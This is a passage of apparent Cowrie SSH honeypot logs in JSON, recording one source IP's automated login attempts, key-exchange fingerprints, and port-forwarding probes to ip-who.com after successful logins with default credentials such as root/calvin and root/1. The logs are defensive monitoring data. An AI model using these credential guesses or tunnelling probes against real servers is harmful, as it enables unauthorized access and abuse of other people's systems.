@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:07:20.061764Z","src_ip":"212.227.235.229","session":"a68d7c358985"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:07:21.960762Z","src_ip":"212.227.235.229","session":"a68d7c358985"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:07:22.211895Z","session":"a68d7c358985"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:07:22.461968Z","src_ip":"212.227.235.229","session":"a68d7c358985"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:07:22.714982Z","src_ip":"212.227.235.229","session":"a68d7c358985"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39060,"dst_ip":"1.2.3.4","dst_port":22,"session":"edc28170e18f","protocol":"ssh","message":"New connection: 212.227.235.229:39060 (1.2.3.4:22) [session: edc28170e18f]","sensor":"my-vps","timestamp":"2025-08-28T08:07:25.616476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:07:25.708349Z","src_ip":"212.227.235.229","session":"edc28170e18f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:07:25.885533Z","src_ip":"212.227.235.229","session":"edc28170e18f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39064,"dst_ip":"1.2.3.4","dst_port":22,"session":"f486b688165c","protocol":"ssh","message":"New connection: 212.227.235.229:39064 (1.2.3.4:22) [session: f486b688165c]","sensor":"my-vps","timestamp":"2025-08-28T08:07:26.016263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:07:26.017151Z","src_ip":"212.227.235.229","session":"f486b688165c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:07:26.280379Z","src_ip":"212.227.235.229","session":"f486b688165c"}
{"eventid":"cowrie.login.failed","username":"strycek","password":"st13ip","message":"login attempt [strycek/st13ip] failed","sensor":"my-vps","timestamp":"2025-08-28T08:07:27.024323Z","src_ip":"212.227.235.229","session":"edc28170e18f"}
{"eventid":"cowrie.login.failed","username":"cf1c22","password":"cf1c22","message":"login attempt [cf1c22/cf1c22] failed","sensor":"my-vps","timestamp":"2025-08-28T08:07:27.874361Z","src_ip":"212.227.235.229","session":"f486b688165c"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:07:28.816751Z","src_ip":"212.227.235.229","session":"edc28170e18f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37652,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dccc6d67640","protocol":"ssh","message":"New connection: 212.227.235.229:37652 (1.2.3.4:22) [session: 7dccc6d67640]","sensor":"my-vps","timestamp":"2025-08-28T08:07:29.025522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:07:29.109051Z","src_ip":"212.227.235.229","session":"7dccc6d67640"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:07:29.131088Z","src_ip":"212.227.235.229","session":"f486b688165c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:07:29.309546Z","src_ip":"212.227.235.229","session":"7dccc6d67640"}
{"eventid":"cowrie.login.success","username":"root","password":"calvin","message":"login attempt [root/calvin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:07:31.277283Z","src_ip":"212.227.235.229","session":"7dccc6d67640"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:07:31.965741Z","session":"7dccc6d67640"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:07:32.230302Z","src_ip":"212.227.235.229","session":"7dccc6d67640"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:07:32.495117Z","src_ip":"212.227.235.229","session":"7dccc6d67640"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40972,"dst_ip":"1.2.3.4","dst_port":22,"session":"06e5fed692ca","protocol":"ssh","message":"New connection: 212.227.235.229:40972 (1.2.3.4:22) [session: 06e5fed692ca]","sensor":"my-vps","timestamp":"2025-08-28T08:07:45.918217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:07:45.919604Z","src_ip":"212.227.235.229","session":"06e5fed692ca"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:07:46.178850Z","src_ip":"212.227.235.229","session":"06e5fed692ca"}
{"eventid":"cowrie.login.failed","username":"master","password":"master","message":"login attempt [master/master] failed","sensor":"my-vps","timestamp":"2025-08-28T08:07:47.742397Z","src_ip":"212.227.235.229","session":"06e5fed692ca"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:07:49.556411Z","src_ip":"212.227.235.229","session":"06e5fed692ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34812,"dst_ip":"1.2.3.4","dst_port":22,"session":"93957167a05f","protocol":"ssh","message":"New connection: 212.227.235.229:34812 (1.2.3.4:22) [session: 93957167a05f]","sensor":"my-vps","timestamp":"2025-08-28T08:07:54.305890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:07:54.308431Z","src_ip":"212.227.235.229","session":"93957167a05f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:07:54.578887Z","src_ip":"212.227.235.229","session":"93957167a05f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47494,"dst_ip":"1.2.3.4","dst_port":22,"session":"393c138e28d2","protocol":"ssh","message":"New connection: 212.227.235.229:47494 (1.2.3.4:22) [session: 393c138e28d2]","sensor":"my-vps","timestamp":"2025-08-28T08:07:56.483825Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"admin","message":"login attempt [user/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T08:07:56.506318Z","src_ip":"212.227.235.229","session":"93957167a05f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:07:57.568508Z","src_ip":"212.227.235.229","session":"393c138e28d2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm